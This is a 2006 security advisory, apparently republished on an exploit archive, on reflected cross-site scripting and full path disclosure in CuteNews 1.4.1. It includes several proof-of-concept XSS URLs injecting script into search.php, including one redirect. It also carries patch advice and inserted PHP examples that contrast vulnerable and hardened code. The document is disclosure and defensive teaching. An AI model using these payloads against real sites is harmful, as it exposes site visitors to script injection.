Exploit: CuteNews 1.4.1 Multiple vulnerabilities


CuteNews 1.4.1 Multiple vulnerabilities

Published: 2006.05.10
Credit: k4p0k4p0 hotmail com
Risk: Medium
CWE: N/A
CVE: CVE-2006-2250, CVE-2006-2249
Local: No
Remote: Yes


/*

---------------------------------------------------------------

[N]eo [S]ecurity [T]eam [NST]® Advisory #20

---------------------------------------------------------------

Program : CuteNews 1.4.1

Homepage: http://www.cutephp.com

Vulnerable Versions: CuteNews 1.4.1 & lower ones

Risk: Medium!

Impact: Cross Site Scripting, Full Path Disclosure

-> CuteNews 1.4.1 Multiple vulnerabilities <-

---------------------------------------------------------------

- Description

---------------------------------------------------------------

CuteNews is a powerful and easy-to-use news management system that uses
flat files to store its database. It supports comments and archives that
can be organized by month.

- Tested

---------------------------------------------------------------

Tested on localhost and on many remote CuteNews installations.

- Bug

---------------------------------------------------------------

1 - [ Cross Site Scripting ]

There are several XSS bugs in the 'search.php' file. They are caused by the
script not properly filtering three _GET variables that are used in some
fields of the web page.

In short, here is the vulnerable code:

    <div align="center">
    <table border="0" cellspacing="0" cellpadding="0">
    <tr>
    <td><table width="100%" cellspacing="0" cellpadding="0">
    <td width="100%">
    <p align="right">News <input type=text value="$story" name=story size="24">
    </table></td>
    </tr>
    <tr>
    <td>
    <div id='advanced' style='display:none;z-index:1;'>
    <table width="100%" cellspacing="0" cellpadding="0">
    <td width="100%" align="right">
    <p align="right">Title <input type=text value="$title" name=title size="24">
    <tr>
    <td width="100%" align="right">Author <input type=text value="$user" name=user size="24">
    </tr>

Those variables were `extracted' (extract()) from the global variables,
but the problem itself is that they are not filtered. So the following
variables allow injection of arbitrary HTML code: $user, $story, $title.

2 - [ Full Path Disclosure ]

In the /inc/ folder there are 2 .php files that don't check whether they
have been called directly.

- Proof of concept

---------------------------------------------------------------

1 - [ Cross site scripting ]

As PoC, here are some interesting results:

- search.php?dosearch=yes&story=%22%3E%3Cscript%3Ealert%28%22NST+PoC+by+K4P0%22%29%3B%3C%2Fscript%3E&title=&user=&from_date_day=&from_date_month=&from_date_year=&to_date_day=&to_date_month=&to_date_year=

- search.php?dosearch=yes&title=%22%3E%3Cscript%3Ealert(%22NST%20PoC%20by%20K4P0%22);%3C/script%3E&user=&from_date_day=&from_date_month=&from_date_year=&to_date_day=&to_date_month=&to_date_year=

- search.php?dosearch=yes&story=K4P0&user=%22%3E%3Cscript%3Ealert(%22NST%20PoC%20by%20K4P0%22);%3C/script%3E&from_date_day=&from_date_month=&from_date_year=&to_date_day=&to_date_month=&to_date_year=

- search.php?dosearch=yes&title="><script>window.location='http://www.neosecurityteam.net/';</script>&user=&from_date_day=&from_date_month=&from_date_year=&to_date_day=&to_date_month=&to_date_year=

Note: magic_quotes_gpc must be off

2 - [ Full path disclosure ]

www.victim.com/cutenews/inc/show.inc.php

www.victim.com/cutenews/inc/functions.inc.php

- Solutions

---------------------------------------------------------------

It is highly recommended to update your CuteNews, but if you want to
patch it yourself, take a look at the following recommendations:

1 - [ Cross site scripting ]

Set magic_quotes_gpc ON in your php.ini, but since this is not possible
on several servers (shared hosting), the real solution is to filter
these variables.

Go to line 25 and change it to this:

    // Show Search Form
    $user = htmlentities($user);
    $story = htmlentities($story);
    $title = htmlentities($title);
    echo<<<HTML
    <script language='javascript' type="text/javascript">
    function mySelect(form){
        form.select();
    }
    function ShowOrHide(d1, d2) {
        if (d1 != '') DoDiv(d1);
        if (d2 != '') DoDiv(d2);
    }
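The advisory's fix in working form, as an added example that is not CuteNews code: the three search fields rendered with raw interpolation next to the same fields rendered through an attribute encoder, driven by a constructed request modelled on the first PoC URL. Reading the parameters from an explicit array instead of extract(), and the function names, are assumptions of this example.

```php
<?php
// Added example, not CuteNews code: the advisory's three search-form fields
// rendered the vulnerable way (raw interpolation) and the hardened way
// (attribute encoding). Assumes the parameters are read explicitly from an
// array instead of being extract()ed into globals.

/** Vulnerable: $story/$title/$user land unencoded inside value="...". */
function render_search_fields_vulnerable(array $get): string
{
    $story = (string)($get['story'] ?? '');
    $title = (string)($get['title'] ?? '');
    $user  = (string)($get['user']  ?? '');
    return "News <input type=\"text\" value=\"$story\" name=\"story\">\n"
         . "Title <input type=\"text\" value=\"$title\" name=\"title\">\n"
         . "Author <input type=\"text\" value=\"$user\" name=\"user\">\n";
}

/** Encode an untrusted value for an HTML attribute context. */
function attr(string $value): string
{
    // ENT_QUOTES encodes both " and ', so the value cannot close the
    // attribute regardless of which quote style the template uses.
    // ENT_SUBSTITUTE keeps invalid UTF-8 from silently emptying the output.
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

/** Hardened: every untrusted value passes through attr() first. */
function render_search_fields_hardened(array $get): string
{
    $story = attr((string)($get['story'] ?? ''));
    $title = attr((string)($get['title'] ?? ''));
    $user  = attr((string)($get['user']  ?? ''));
    return "News <input type=\"text\" value=\"$story\" name=\"story\">\n"
         . "Title <input type=\"text\" value=\"$title\" name=\"title\">\n"
         . "Author <input type=\"text\" value=\"$user\" name=\"user\">\n";
}

// Constructed request modelled on the advisory's first PoC: the value closes
// the attribute and the tag, then injects a <script> element.
$get = ['dosearch' => 'yes', 'story' => '"><script>alert("NST PoC");</script>'];

$bad  = render_search_fields_vulnerable($get);
$good = render_search_fields_hardened($get);

// The vulnerable output carries a live <script> element; the hardened output
// carries the payload only as encoded text (&quot;&gt;&lt;script&gt;...).
var_dump(strpos($bad, '<script>') !== false, strpos($good, '<script>') !== false);
```

The advisory's plain htmlentities() call uses ENT_COMPAT by default, which encodes double quotes but not single quotes; that is sufficient for the double-quoted value="..." attributes in this template, while ENT_QUOTES also covers templates that quote attributes with single quotes.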

2 - [ Full Path Disclosure ]

In the first line of 'functions.inc.php' write:

    if (eregi('functions.inc.php', $_SERVER['PHP_SELF']))
        die('You are not allowed to see this page directly');

In the first line of 'shows.inc.php' write:

    if (eregi('shows.inc.php', $_SERVER['PHP_SELF']))
        die('You are not allowed to see this page directly');
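A guard for the two /inc/ files that avoids eregi(), which was removed in PHP 7, and $_SERVER['PHP_SELF'], which is derived from the request path and so can be influenced by the client; added example, not CuteNews code. The marker constant CUTENEWS_LOADED and the entry-script layout are assumptions of this example.

```php
<?php
// Added example, not CuteNews code: an include guard for the two /inc/ files
// that relies neither on eregi() (removed in PHP 7) nor on $_SERVER['PHP_SELF']
// (built from the request path). The entry script defines a marker constant
// before including the files; each include refuses to run without it.
// CUTENEWS_LOADED is a hypothetical name chosen for this example.

// In the entry script that legitimately includes the files, before the
// require lines:
//
//     define('CUTENEWS_LOADED', true);
//     require __DIR__ . '/inc/functions.inc.php';
//     require __DIR__ . '/inc/shows.inc.php';

// First lines of inc/functions.inc.php and inc/shows.inc.php:
if (!defined('CUTENEWS_LOADED')) {
    // A direct request never passes through the entry script, so the
    // constant is missing. Answer 404 and stop before any other code runs,
    // so no undefined-function notice can print the file's absolute path.
    http_response_code(404);
    exit;
}
```

PHP's own error output is where the absolute path typically leaks, so display_errors=Off together with log_errors=On in production closes this class independently of the guard.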

- Timeline

---------------------------------------------------------------

03/03/2006 - Vendor was notified about security issues

*** - Vendor did not reply but released a newer version.

- Disclaimer

---------------------------------------------------------------

YOU are the only one RESPONSIBLE for any DAMAGE the above techniques
could cause or any code you have made based on this advisory; all
ideas, proofs of concept, solutions and descriptions were made only
for EDUCATIONAL purposes. Use all the above information at your own
risk.

- References

---------------------------------------------------------------

http://NeoSecurityTeam.net/index.php?action=advisories&id=20

http://NeoSecurityTeam.net/advisories/Advisory-20.txt

- Credits

---------------------------------------------------------------

Discovered by k4p0 -> k4p0k4p0[at]hotmail[dot]com

[N]eo [S]ecurity [T]eam [NST]® - http://NeoSecurityTeam.net/

Irc.FullNnetwork.org #nst

Questions? (Eng | Spa) -> http://NeoSecurityTeam.net/foro/

- Greets

---------------------------------------------------------------

Paisterist

HaCkZaTaN

Link

Daemon21

erg0t

NST Comunity!

@@@@'''@@@@'@@@@@@@@@'@@@@@@@@@@@

'@@@@@''@@'@@@''''''''@@''@@@''@@

'@@'@@@@@@''@@@@@@@@@'''''@@@''''

'@@'''@@@@'''''''''@@@''''@@@''''

@@@@''''@@'@@@@@@@@@@''''@@@@@'''

*/

Copyright 2014, cxsecurity.com